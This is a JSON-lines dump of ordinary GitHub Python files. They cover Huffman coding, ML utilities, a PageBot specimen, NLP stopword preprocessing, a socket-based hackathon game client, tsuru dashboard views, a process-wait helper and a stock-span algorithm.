{"seq_id":"37401026909","text":"import heapq\r\n\r\nclass node:\r\n def __init__(self, freq, symbol, left=None, right=None):\r\n\r\n self.freq = freq\r\n\r\n self.symbol = symbol\r\n\r\n self.left = left\r\n\r\n self.right = right\r\n\r\n self.huff = ''\r\n\r\n def __lt__(self, nxt):\r\n return self.freq < nxt.freq\r\n\r\ndef printNodes(node, val=''):\r\n\r\n #create newVal\r\n newVal = val + str(node.huff)\r\n\r\n #if node is not a leaf --> keep traversing\r\n if node.left:\r\n printNodes(node.left, newVal)\r\n if node.right:\r\n printNodes(node.right, newVal)\r\n\r\n #if node is a leaf --> print its code\r\n if(not node.left and not node.right):\r\n print(f\"{node.symbol} -> {newVal}\")\r\n\r\nchars = ['a', 'b', 'c', 'd', 'e', 'f']\r\n\r\nfreq = [5, 9, 12, 13, 16, 45]\r\n\r\nnodes = []\r\n\r\nfor x in range(len(chars)):\r\n heapq.heappush(nodes, node(freq[x], chars[x]))\r\n\r\nwhile len(nodes)>1:\r\n\r\n #pop the two lowest-frequency nodes\r\n left = heapq.heappop(nodes)\r\n right = heapq.heappop(nodes)\r\n\r\n #assign bit: 0 for the left branch, 1 for the right\r\n left.huff = 0\r\n right.huff = 1\r\n\r\n #combine smallest nodes and make parent node\r\n newNode = node(left.freq+right.freq, left.symbol+right.symbol, left, right)\r\n\r\n #push the merged node back onto the heap\r\n heapq.heappush(nodes, newNode)\r\n\r\n#display the Huffman codes by traversing the tree\r\nprintNodes(nodes[0])\r\n","repo_name":"NishantSKumbhar/LP","sub_path":"LP3/DAA/huffman/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"22680004641","text":"import torch\nimport torch.nn.functional as F\n\n\ndef ensemble_max_response_pre(config, model, train_loader, val_loader):\n return model, {} # nothing\n\n\ndef ensemble_max_response_metric(config, method_variables, model, imgs, targets):\n assert isinstance(model, list) and len(model) > 1\n\n res = []\n for m_i in range(len(model)):\n with torch.no_grad():\n preds = model[m_i](imgs)\n softmax_preds = F.softmax(preds, dim=1)\n res.append(softmax_preds)\n res = torch.stack(res, dim=0) # num models, num samples, num classes\n avg_preds = res.mean(dim=0) # num_samples, classes\n assert len(avg_preds.shape) == 2\n top_classes_preds, top_classes = avg_preds.max(dim=1) # num_samples\n assert len(top_classes.shape) == 1 and len(top_classes_preds.shape) == 1\n\n correct = top_classes.eq(targets)\n unreliability = 1. 
- top_classes_preds\n\n return unreliability, correct\n","repo_name":"xu-ji/subfunctions","sub_path":"util/methods/ensemble_max_response.py","file_name":"ensemble_max_response.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
{"seq_id":"31171191351","text":"from random import randint\nfrom time import sleep\nnúmerosSorteados = []\n\ndef sorteio(lista):\n print(f'Drawing {len(lista)} values for the list:', end=' ')\n for c in range(0, 5):\n lista.append(randint(1, 10))\n print(lista[c], end=' ')\n sleep(0.3)\n print('DONE!')\n\ndef somaPar(lista):\n soma = 0\n for c in lista:\n if c % 2 == 0:\n soma += c\n print(f'Summing the even values of {lista}, we get {soma}')\n\n\nsorteio(númerosSorteados)\nsomaPar(númerosSorteados)\n\n","repo_name":"Nadirlene/Exercicios-python","sub_path":"Exerciciospython2/Função/e100.py","file_name":"e100.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16014060963","text":"from pagebot.style import getRootStyle, LEFT\nfrom pagebot.document import Document\nfrom pagebot.elements.pbpage import Template\nfrom pagebot.composer import Composer\nfrom pagebot.typesetter import Typesetter\nfrom pagebot.elements import Galley, Rect\nfrom pagebot.elements.variablefonts.variablecube import VariableCube\nfrom pagebot.fonttoolbox.variablefontbuilder import getVariableFont\nfrom random import random # needed by makeSpecimen() below\n \nDEBUG = False\n\nSHOW_GRID = DEBUG\nSHOW_GRID_COLUMNS = DEBUG\nSHOW_BASELINE_GRID = DEBUG\nSHOW_FLOW_CONNECTIONS = DEBUG\n\nEXPORT_PATH = 'export/variableFontDesign.pdf'\n \n# Get the default root style and overwrite values for this document.\nU = 7\nbaselineGrid = 2*U\nlistIndent = 1.5*U\n\nRS = getRootStyle(\n u = U, # Page base unit\n # Basic layout measures altering the default root style.\n w = 595, # On root level the \"w\" is the page width 210mm, international generic fit.\n h = 11 * 72, # Page height 11\", international generic fit.\n ml = 7*U, # Margin left; rs.mt = 7*U # Margin top\n baselineGrid = baselineGrid,\n g = U, # Generic gutter.\n # Column width. Uneven means possible split in 5+1+5 or even 2+1+2 +1+ 2+1+2\n # 11 is the best in that respect for column calculation.\n cw = 11*U, \n ch = 6*baselineGrid - U, # Approx. 
square and fitting with baseline.\n listIndent = listIndent, # Indent for bullet lists\n listTabs = [(listIndent, LEFT)], # Match bullet+tab with left indent.\n # Display option during design and testing\n showGrid = SHOW_GRID,\n showGridColumns = SHOW_GRID_COLUMNS,\n showBaselineGrid = SHOW_BASELINE_GRID,\n showFlowConnections = SHOW_FLOW_CONNECTIONS,\n # Text measures\n leading = baselineGrid,\n rLeading = 0,\n fontSize = 9\n)\n# Tracking presets\nH1_TRACK = H2_TRACK = 0.015 # 1/1000 of fontSize, multiplier factor.\nH3_TRACK = 0.030 # Tracking as relative factor to font size.\nP_TRACK = 0.030\n\nFONT_DIR = '../../../fonts/'\nFONT_NAME = 'BitcountGrid-GX.ttf'\nFONT_PATH = FONT_DIR + FONT_NAME\n\n# ----------------------------------------------------------------- \ndef makeSpecimen(rs):\n \n # Create new document with (w,h) and fixed amount of pages.\n # Make number of pages with default document size.\n # Initially make all pages default with template2\n doc = Document(rs, autoPages=2) \n\n page1 = doc[1]\n vCube = VariableCube(FONT_PATH, w=500, h=500, s='a', fontSize=86, dimensions=dict(wght=4,rnds=4))\n page1.place(vCube, 50, 160)\n\n font = getVariableFont(FONT_PATH, location=dict(wght=-0.5, rnds=2,diam=0.5))\n page2 = doc[2]\n for n in range(600):\n page2.text(FormattedString('@', font=font, fontSize=800, fill=(random(), random(), random(), 0.8)), 50+random()*100, 200+random()*100)\n return doc\n \nd = makeSpecimen(RS)\nd.export(EXPORT_PATH) \n\n","repo_name":"enathu/PageBot","sub_path":"Examples/TYPETR/Bitcount/scripts-in-progress/BitcountUsage.py","file_name":"BitcountUsage.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"35963738435","text":"from nltk.tokenize import sent_tokenize, word_tokenize # for tokenizing sentences and words\r\nimport re # for removing multiple \\s characters and source formatting\r\nimport local_util as u\r\nlogger = u.get_logger( __name__ ) # https://docs.python.org/3/howto/logging.html\r\n\r\n\r\nclass preprocess:\r\n\tdef __init__(self):\r\n\t\tself.STOP_WORDS = None\r\n\t\tself.STOP_TOKENIZE = True # +D3.err, original loop above: no change, still R1.R=0.22264.\r\n\t\tself.STOP_QRFLAG = True # Whether or not to apply stopwords to qrmatrix population.\r\n\t\tself.STOP_DEBUG_CUTOFF = 50 # Only dump the first 50 stop_word hits.\r\n\t\tself.stop_words = self.get_stop_words()\r\n\t\tself.stop_file = \"src/stop_words\"\r\n\r\n\tdef get_stop_words(self):\r\n\r\n\t if self.STOP_WORDS:\r\n\t return self.STOP_WORDS # recycle what we already have.\r\n\t # If we reach this point, STOP_WORDS is None so we need to load it.\r\n\t self.STOP_WORDS = dict( ) # start a new dictionary,\r\n\t self.stop_words = self.STOP_WORDS # jgreve: aliasing original var name (lower case stop_wrods)\r\n\t # so I don't edit the actual logic.\r\n\t \r\n\t self.stop_file = \"src/stop_words\"\r\n\t logger.info('get_stop_words(): loading stop_words from %s', self.stop_file )\r\n\t stops = open(self.stop_file)\r\n\t stop_lines = stops.read().split(\"\\n\")\r\n\r\n\t #for line in stop_lines:\r\n\t # line = line.lower()\r\n\t # if line not in stop_words:\r\n\t # stop_words[line] = 0\r\n\r\n\t logger.info('get_stop_words(): loading stop_words from %s', self.stop_file )\r\n\t stop_line_cnt = 0\r\n\t for line in stop_lines:\r\n\t stop_line_cnt += 1\r\n\t line = line.lower().strip()\r\n\t if self.STOP_TOKENIZE:\r\n\t words = word_tokenize( line )\r\n\t # logger.debug('stop_words[{:03d}]: line=\"{}\" --> 
words={}'.format(stop_line_cnt, line, words ))\r\n\t for word in words:\r\n\t self.stop_words[word] = 0\r\n\t else:\r\n\t # original D3 code.\r\n\t if line not in self.stop_words:\r\n\t self.stop_words[line] = 0\r\n\t msg = 'get_stop_words(): loaded #stop_words=%d, #lines=%d, STOP_TOKENIZE=%s STOP_QRFLAG=%s' % ( len(self.stop_words), stop_line_cnt, str(self.STOP_TOKENIZE), str(self.STOP_QRFLAG) )\r\n\t logger.info( msg )\r\n\t u.eprint(msg)\r\n\t return self.STOP_WORDS # important: this *must* still point to the same thing stop_words does.\r\n\r\n\t# Return list of tokenized words from sentence\r\n\tdef preprocess_words(self, sentence):\r\n\t raw_words = word_tokenize(sentence)\r\n\t norm_words = []\r\n\t words = []\r\n\t#-----------------------------------------------------------------------------\r\n\r\n\t # before D3.err (d3_orig) yields R1.R = 0.22264\r\n\t if not self.STOP_QRFLAG:\r\n\t # Original D3 code, here for human traceability\r\n\t for w in raw_words:\r\n\t if re.search(\"[a-zA-Z]\", w) != None:\r\n\t norm_words.append(w.lower())\r\n\t # words.append(w)\r\n\t else:\r\n\t # This started working in post-hoc anlaysis, then didn't\r\n\t # with a minor refactoring, leading the 2nd stopword bug.\r\n\t for w in raw_words:\r\n\t if re.search(\"[a-zA-Z]\", w) != None:\r\n\t w = w.lower()\r\n\t if w not in self.stop_words:\r\n\t norm_words.append(w) # keep it\r\n\t else:\r\n\t self.stop_words[w] += 1 # track how often we \"hit\" this stop word.\r\n\t if self.STOP_DEBUG_CUTOFF >= 1:\r\n\t self.STOP_DEBUG_CUTOFF -= 1\r\n\t logger.debug('stop_words: hit w=\"%s\", so not adding to norm_words', w )\r\n\r\n\t # The following yields R1.R = 0.24428\r\n\t #------------------------------------\r\n\t #if w not in stop_words:\r\n\t # norm_words.append(w) # keep it\r\n\t #------------------------------------\r\n\r\n\t #------------------------------------\r\n\t # The following yields R1.R = 0.24428\r\n\t #------------------------------------\r\n\t #if STOP_TOKENIZE:\r\n\t # # we'll check stopwords in the next loop\r\n\t # # (since the stop words are tokenized).\r\n\t # norm_words.append(w.lower())\r\n\t #else:\r\n\t # # let's check stopwords now.\r\n\t # w = w.lower()\r\n\t # if w not in stop_words:\r\n\t # norm_words.append(w) # keep it\r\n\t # else:\r\n\t # stop_words[w] += 1 # track how much our stopwords actually stop.\r\n\t #------------------------------------\r\n\t # words.append(w)\r\n\t#-----------------------------------------------------------------------------\r\n\r\n\t for w in norm_words:\r\n\t if w not in self.stop_words:\r\n\t words.append(w)\r\n\t # jgreve: this uses stopword logic but doesn't\r\n\t # make it into qrmatrix so leaving as-is.\r\n\t return words, norm_words\r\n\r\n\r\n\t# Return sentences from paragraph\r\n\tdef preprocess_sents(self, paragraph):\r\n\t sentences = sent_tokenize(paragraph)\r\n\t return sentences\r\n\r\n\t# Return a list of all the words (with frequency counts) in a docset\r\n\tdef words_from_docset(self, docset):\r\n\t\tdocset_words = {}\r\n\t\tfor idx, article in enumerate(docset.articles):\r\n\t\t\t\tparagraphs = article.paragraphs\r\n\t\t\t\tif len(paragraphs):\r\n\t\t\t\t\tfor paragraph in paragraphs:\r\n\t\t\t\t\t\tsentences = self.preprocess_sents(paragraph)\r\n\t\t\t\t\t\tfor sentence in sentences:\r\n\t\t\t\t\t\t\twords, _ = self.preprocess_words(sentence)\r\n\t\t\t\t\t\t\tfor word in words:\r\n\t\t\t\t\t\t\t\tif word in docset_words:\r\n\t\t\t\t\t\t\t\t\tdocset_words[word] += 1\r\n\t\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\t\tdocset_words[word] = 
1\r\n\t\treturn docset_words","repo_name":"JoshuaMathias/summarizer","sub_path":"src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14922709030","text":"import argparse\n\nfrom baselinev2.nn.social_lstm.model import LINEAR, LSTM\n\n\ndef bool_flag(v):\n if isinstance(v, bool):\n return v\n elif v.lower() in (\"yes\", \"true\", \"y\", \"1\"):\n return True\n elif v.lower() in (\"no\", \"false\", \"n\", \"0\"):\n return False\n else:\n raise argparse.ArgumentTypeError(\"Boolean value excepted!\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\"Trajectory Prediction Basics\")\n\n # Configs for Model\n parser.add_argument(\"--model_name\", default=\"\", type=str, help=\"Define model name for saving\")\n parser.add_argument(\"--model_type\", default=\"lstm\", type=str,\n help=\"Define type of model. Choose either: linear, lstm or social-lstm\")\n parser.add_argument(\"--save_model\", default=True, type=bool_flag, help=\"Save trained model\")\n parser.add_argument(\"--nl_ADE\", default=False, type=bool_flag, help=\"Use nl_ADE\")\n parser.add_argument(\"--load_model\", default=False, type=bool_flag, help=\"Specify whether to load existing model\")\n parser.add_argument(\"--lstm_pool\", default=False, type=bool_flag, help=\"Specify whether to enable social pooling\")\n parser.add_argument(\"--pooling_type\", default=\"social_pooling\", type=str, help=\"Specify pooling method\")\n parser.add_argument(\"--neighborhood_size\", default=10.0, type=float, help=\"Specify neighborhood size to one side\")\n parser.add_argument(\"--grid_size\", default=10, type=int, help=\"Specify grid size\")\n parser.add_argument(\"--args_set\", default=\"\", type=str,\n help=\"Specify predefined set of configurations for respective model. \"\n \"Choose either: lstm or social-lstm\")\n\n # Configs for data-preparation\n parser.add_argument(\"--dataset_name\", default=\"to_be_defined\", type=str, help=\"Specify dataset\")\n parser.add_argument(\"--dataset_type\", default=\"square\", type=str,\n help=\"Specify dataset-type. For real datasets choose: 'real'. 
\"\n \"For synthetic datasets choose either 'square' or 'rectangle'\")\n parser.add_argument(\"--obs_len\", default=8, type=int, help=\"Specify length of observed trajectory\")\n parser.add_argument(\"--pred_len\", default=12, type=int, help=\"Specify length of predicted trajectory\")\n parser.add_argument(\"--data_augmentation\", default=True, type=bool_flag,\n help=\"Specify whether or not you want to use data augmentation\")\n parser.add_argument(\"--batch_norm\", default=False, type=bool_flag, help=\"Batch Normalization\")\n parser.add_argument(\"--max_num\", default=1000000, type=int, help=\"Specify maximum number of ids\")\n parser.add_argument(\"--skip\", default=20, type=int, help=\"Specify skipping rate\")\n parser.add_argument(\"--PhysAtt\", default=\"\", type=str, help=\"Specify physicalAtt\")\n parser.add_argument(\"--padding\", default=True, type=bool_flag, help=\"Specify if padding should be active\")\n parser.add_argument(\"--final_position\", default=False, type=bool_flag,\n help=\"Specify whether final positions of pedestrians should be passed to model or not\")\n\n # Configs for training, validation, testing\n parser.add_argument(\"--batch_size\", default=32, type=int, help=\"Specify batch size\")\n parser.add_argument(\"--wd\", default=0.03, type=float, help=\"Specify weight decay\")\n parser.add_argument(\"--lr\", default=0.001, type=float, help=\"Specify learning rate\")\n parser.add_argument(\"--encoder_h_dim\", default=64, type=int, help=\"Specify hidden state dimension h of encoder\")\n parser.add_argument(\"--decoder_h_dim\", default=32, type=int, help=\"Specify hidden state dimension h of decoder\")\n parser.add_argument(\"--emb_dim\", default=32, type=int, help=\"Specify dimension of embedding\")\n parser.add_argument(\"--num_epochs\", default=250, type=int, help=\"Specify number of epochs\")\n parser.add_argument(\"--dropout\", default=0.0, type=float, help=\"Specify dropout rate\")\n parser.add_argument(\"--num_layers\", default=1, type=int, help=\"Specify number of layers of LSTM/Social LSTM Model\")\n parser.add_argument(\"--optim\", default=\"Adam\", type=str,\n help=\"Specify optimizer. 
Choose either: adam, rmsprop or sgd\")\n\n # Get arguments\n args = parser.parse_args()\n\n print(\"Linear\")\n print(LINEAR(args))\n\n print(\"LSTM\")\n print(LSTM(args))\n","repo_name":"rishabhraaj17/MastersThesis","sub_path":"baselinev2/nn/social_lstm/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"22128611135","text":"import socket\nimport time\nfrom curtsies import Input\nfrom threading import Thread\nimport struct\nimport sys\nimport colors\n\n\nclass Client():\n Port = 13117\n BUFF = 1024\n\n def __init__(self, name):\n # UDP Socket\n self.conn_udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\n # struct format of messages\n self.udp_format = 'IbH'\n self.magicCookie = 0xfeedbeef\n self.message_type = 0x2\n\n # Enable broadcasting mode\n self.conn_udp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.conn_udp.bind((\"\", Client.Port))\n\n # variable that helps to determine if the client is still playing or not, updated accordingly.\n self.is_playing = False\n self.name = name\n\n # initializes TCP connection with server in every game session\n def connect_tcp(self, ip, port):\n self.conn_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.conn_tcp.connect((ip, port))\n\n # closes TCP connection with server in every game session\n def close(self):\n self.conn_tcp.close()\n self.conn_tcp = None\n\n # looking for a server mode\n # receiving UDP broadcast messages from servers in order to initiate TCP connection with the first server\n def looking_for_server(self):\n print(f\"{colors.Yellow}Client started, listening for offer requests...{colors.Reset}\")\n data, addr = None, None\n while True:\n data, addr = self.conn_udp.recvfrom(Client.BUFF)\n try:\n # accept only udp messages of the expected format\n message = struct.unpack(self.udp_format, data)\n except struct.error:\n return\n if message[0] == self.magicCookie and message[1] == self.message_type:\n print(f\"Received offer from {addr[0]}, attempting to connect...\")\n break\n # server's ip - addr[0]\n # server's port - message[2]\n self.connecting_to_server(addr[0], int(message[2]))\n\n # try to connect to the server over TCP in order to participate in the game\n def connecting_to_server(self, ip, port):\n try:\n time.sleep(1)\n self.connect_tcp(ip, port)\n except Exception as e:\n print(\"connection failed, reconnecting...\")\n # if the connection failed, update is_playing\n self.is_playing = False\n return\n # send the client's team name for the game\n self.conn_tcp.send(self.name.encode('utf-8'))\n self.is_playing = True\n\n # game mode - any key press event is caught and sent to the server\n def game_mode(self):\n with Input(keynames=\"curtsies\", sigint_event=True) as input_generator:\n try:\n while self.is_playing:\n key = input_generator.send(0.1)\n if key:\n print(key)\n self.conn_tcp.send((key + '\\n').encode('utf-8'))\n except Exception:\n return\n\n # in game mode - receiving messages from the server\n # summary messages (game over and more...)\n def recv_msgs(self):\n while True:\n try:\n message = self.conn_tcp.recv(Client.BUFF)\n except:\n print(\"Server disconnected, listening for offer requests...\")\n self.is_playing = False\n return\n if not message:\n print(\"Server disconnected, listening for offer requests...\")\n self.is_playing = False\n return\n print(message.decode())\n\n\nif __name__ == \"__main__\":\n # name of 
the client's team, passed as a command-line argument at run time\n name = str(sys.argv[1])\n\n client = Client(name)\n\n while True:\n client.looking_for_server()\n\n # game mode!\n if client.is_playing:\n t1 = Thread(target=client.game_mode, daemon=True)\n t2 = Thread(target=client.recv_msgs, daemon=True)\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n client.close()\n","repo_name":"RonitTsysar/hackathon","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23092895433","text":"import requests\n\nfrom datetime import datetime, timedelta\n\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.views.generic import TemplateView\n\nfrom pytz import utc\nfrom dateutil import parser\n\nfrom tsuru_dashboard import settings\nfrom tsuru_dashboard.auth.views import LoginRequiredView\n\n\nclass DashboardView(LoginRequiredView, TemplateView):\n template_name = \"dashboard/dashboard.html\"\n\n\nclass HealingView(LoginRequiredView):\n def get(self, request):\n url = \"{}/docker/healing\".format(settings.TSURU_HOST)\n response = requests.get(url, headers=self.authorization)\n\n if response.status_code != 200:\n return JsonResponse({\"healing\": 0})\n\n healings = 0\n for healing in response.json():\n end_time = parser.parse(healing['EndTime'])\n if end_time.tzinfo:\n end_time = end_time.astimezone(utc)\n else:\n end_time = utc.localize(end_time)\n now = utc.localize(datetime.utcnow())\n if (now - end_time < timedelta(days=1)):\n healings += 1\n return JsonResponse({\"healing\": healings}, safe=False)\n\n\nclass CloudStatusView(LoginRequiredView):\n def total_apps_and_containers(self):\n url = \"{}/apps\".format(settings.TSURU_HOST)\n response = requests.get(url, headers=self.authorization)\n total_containers = 0\n\n if response.status_code != 200:\n return 0, total_containers\n\n apps = response.json()\n for app in apps:\n total_containers += len(app['units'])\n\n return len(apps), total_containers\n\n def total_nodes(self):\n url = \"{}/docker/node\".format(settings.TSURU_HOST)\n response = requests.get(url, headers=self.authorization)\n\n if response.status_code != 200:\n return 0\n\n nodes = response.json()\n return len(nodes['nodes'])\n\n def containers_by_nodes(self, containers, nodes):\n if containers <= 0 or nodes <= 0:\n return 0\n return containers/nodes\n\n def get(self, request):\n total_apps, total_containers = self.total_apps_and_containers()\n total_nodes = self.total_nodes()\n containers_by_nodes = self.containers_by_nodes(total_containers, total_nodes)\n\n data = {\n \"total_apps\": total_apps,\n \"containers_by_nodes\": containers_by_nodes,\n \"total_containers\": total_containers,\n \"total_nodes\": total_nodes,\n }\n return JsonResponse(data, safe=False)\n\n\nclass DeploysView(LoginRequiredView):\n def get(self, request):\n url = \"{}/deploys?limit=1000\".format(settings.TSURU_HOST)\n deploys = requests.get(url, headers=self.authorization).json() or []\n errored = 0\n last_deploys = 0\n for deploy in deploys:\n timestamp = parser.parse(deploy['Timestamp'])\n if timestamp.tzinfo:\n timestamp = timestamp.astimezone(utc)\n else:\n timestamp = utc.localize(timestamp)\n now = utc.localize(datetime.utcnow())\n if (now - timestamp < timedelta(days=1)):\n if deploy['Error']:\n errored += 1\n last_deploys += 1\n return JsonResponse({\"last_deploys\": last_deploys, \"errored\": errored}, safe=False)\n\n\nclass IndexView(LoginRequiredView):\n 
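# Root URL: authenticated users are redirected straight to the apps list.\n 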
def get(self, request):\n return HttpResponseRedirect(\"/apps\")\n","repo_name":"tsuru/tsuru-dashboard","sub_path":"tsuru_dashboard/dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":137,"dataset":"github-code","pt":"53"} +{"seq_id":"31409288626","text":"import psutil\nimport time\n\ndef checkProcessRunning(pid): \n for proc in psutil.process_iter(): \n if proc.pid == pid:\n return True\n \n return False \n\nprocess = int(input('pid: '))\nscript = input('name of script: ')\nwhile checkProcessRunning(process): \n time.sleep(20)\n\nimport os\nos.system('. %s' % script)\n","repo_name":"twardlab/stroke_detection","sub_path":"scripts/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8771833148","text":"from dataset import DisentanglementDataset\nfrom solvers.vae import VAESolver\nfrom typing import Optional\nfrom models import SoftIntroVAE\nfrom ops import (\n gaussian_log_density,\n kl_divergence,\n minibatch_stratified_sampling,\n minibatch_weighted_sampling,\n total_correlation,\n)\n\nfrom contextlib import nullcontext\nimport torch\nfrom torch.optim import Optimizer\nfrom torch import Tensor\nfrom torch.cuda.amp.grad_scaler import GradScaler\nfrom torch.utils.tensorboard import SummaryWriter\nfrom utils import SingletonWriter\n\n\nclass TCSovler(VAESolver):\n def __init__(\n self,\n dataset: DisentanglementDataset,\n model: SoftIntroVAE,\n batch_size: int,\n optimizer_e: Optimizer,\n optimizer_d: Optimizer,\n recon_loss_type: str,\n beta_kl: float,\n beta_rec: float,\n device: torch.device,\n use_amp: bool,\n grad_scaler: Optional[GradScaler],\n writer: Optional[SummaryWriter] = None,\n test_iter: int = 1000,\n clip: Optional[float] = None,\n ):\n super().__init__(\n dataset,\n model,\n batch_size,\n optimizer_e,\n optimizer_d,\n recon_loss_type,\n beta_kl,\n beta_rec,\n device,\n use_amp,\n grad_scaler,\n writer,\n test_iter,\n clip,\n )\n\n\n def compute_kl_loss(\n self,\n z: Optional[Tensor],\n mu: Tensor,\n logvar: Tensor,\n reduce: str = \"mean\",\n beta: float = None,\n write: bool = False\n ) -> Tensor:\n return TCSovler._compute_kl_loss_simple(self, z, mu, logvar, reduce, beta, write)\n\n def _compute_kl_loss_simple(\n self,\n z: Optional[Tensor],\n mu: Tensor,\n logvar: Tensor,\n reduce: str = \"mean\",\n beta: float = None,\n write: bool = False\n ) -> Tensor:\n if beta is None:\n beta = self.beta_kl\n\n dataset_size = len(self.dataset)\n\n kl_loss = kl_divergence(logvar, mu, reduce=reduce)\n tc = total_correlation(\n z, mu, logvar, dataset_size, reduce=reduce\n )\n if write:\n self.write_scalar(SingletonWriter().cur_iter, \"kl_loss_unscaled\", kl_loss)\n return (beta - 1.0) * tc + kl_loss\n\n def _compute_kl_loss_full(\n self,\n z: Optional[Tensor],\n mu: Tensor,\n logvar: Tensor,\n reduce: str = \"mean\",\n beta: float = None,\n write: bool = False\n ) -> Tensor:\n if beta is None:\n beta = self.beta_kl\n\n batch_size = z.size(0)\n dataset_size = len(self.dataset)\n\n # calculate log q(z|x)\n logqz_condx = gaussian_log_density(z, mu, logvar).sum(dim=1)\n\n # calculate log p(z)\n # mean and log var is 0\n zeros = torch.zeros_like(z)\n logpz = gaussian_log_density(z, zeros, zeros).sum(dim=1)\n\n log_qz_prob = gaussian_log_density(\n z.unsqueeze(1), mu.unsqueeze(0), logvar.unsqueeze(0)\n )\n logqz_prodmarginals, log_qz = minibatch_stratified_sampling(\n 
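# minibatch estimates of sum_j log q(z_j) and of log q(z) (stratified sampling)\n 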
log_qz_prob, batch_size, dataset_size\n )\n\n mi_loss = logqz_condx - log_qz\n tc_loss = log_qz - logqz_prodmarginals\n kl_loss = logqz_prodmarginals - logpz\n\n if reduce == \"mean\":\n mi_loss = torch.mean(mi_loss)\n tc_loss = torch.mean(tc_loss)\n kl_loss = torch.mean(kl_loss)\n\n if SingletonWriter().writer and reduce == \"mean\":\n SingletonWriter().writer.add_scalars(\n \"tc_decomp\",\n { \n \"mi\": mi_loss.data.item(),\n \"tc\": tc_loss.data.item(),\n \"kl\": kl_loss.data.item()\n },\n global_step=SingletonWriter().cur_iter,\n )\n if write:\n self.write_scalar(SingletonWriter().cur_iter, \"kl_loss_unscaled\", mi_loss + tc_loss + kl_loss)\n\n # recombine to get loss:\n return mi_loss + beta * tc_loss + kl_loss\n","repo_name":"meffmadd/intro-tc-vae","sub_path":"solvers/tc.py","file_name":"tc.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"18824228642","text":"from flask import jsonify\nfrom flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\nfrom models.exchanges.select_exchange import GetExchange\n\nclass Klines(Resource):\n\n \n parser = reqparse.RequestParser()\n parser.add_argument('pair',\n type=str,\n required=True,\n help=\"pair cannot be blank!\"\n )\n parser.add_argument('timeframe',\n type=int,\n required=True,\n help=\"timeframe cannot be blank!\"\n )\n parser.add_argument('start_time',\n type=str,\n required=False,\n help=\"start_time!\"\n )\n parser.add_argument('end_time',\n type=str,\n required=False,\n help=\"end_time!\"\n )\n\n @classmethod\n def collect_klines(cls, botid, data):\n ex = GetExchange(botid)\n return ex.get_kline(data['pair'],data['timeframe'],data['start_time'],data['end_time'])\n\n\n @jwt_required()\n def get(self, botid):\n \"\"\"\n get klines\n It is necessary to send an access token\n ---\n tags:\n - exchange data\n parameters:\n - in: path\n botid: botid\n type: string\n required: true\n - in: path\n name: pair like ETHUSDT\n type: string\n required: true\n - in: path\n name: time frame, a multiple of 1 minute\n type: int\n required: true\n - in: path\n name: start time, must be epoch time\n type: string\n required: false\n - in: path\n name: end time, must be epoch time\n type: string\n required: false\n\n responses:\n 200:\n description: A single user item\n schema:\n id: User\n properties:\n pair:\n type: string\n description: like XBTUSDTM\n \n klines:\n type: float\n description: time open high low close volume\n 501:\n \"\"\"\n try:\n data = Klines.parser.parse_args()\n response = self.collect_klines(botid, data)\n return {'pair': data['pair'] , 'FormalName' : response[0], 'klines' : response[1]} , 200\n except Exception as e:\n print(f\"{e}\")\n return {'message': 'bot not found'}, 501","repo_name":"sinaban/bot-backend","sub_path":"resources/exchange/get_klines.py","file_name":"get_klines.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"1032614379","text":"\n\ndef stockSpan(arr):\n\n stack, vector = [], []\n for i in range(len(arr)):\n if len(stack) == 0:\n vector.append(-1)\n elif arr[i] < stack[-1][0]:\n vector.append(stack[-1][1])\n elif len(stack) != 0 and arr[i] >= stack[-1][0]:\n while len(stack) != 0 and arr[i] >= stack[-1][0]:\n stack.pop()\n if len(stack) == 0:\n vector.append(-1)\n else:\n vector.append(stack[-1][1])\n stack.append([arr[i], i])\n return 
vector\n\narr=[100,80,60,70,60,75,85]\nvector=stockSpan(arr)\nprint(vector)\nres=[]\nfor i in range(len(vector)):\n res.append(i-vector[i])\nprint(res)\n\n\n","repo_name":"NIDHISH99444/InterviewPrep2022Dec21","sub_path":"Stack/StockSpan.py","file_name":"StockSpan.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
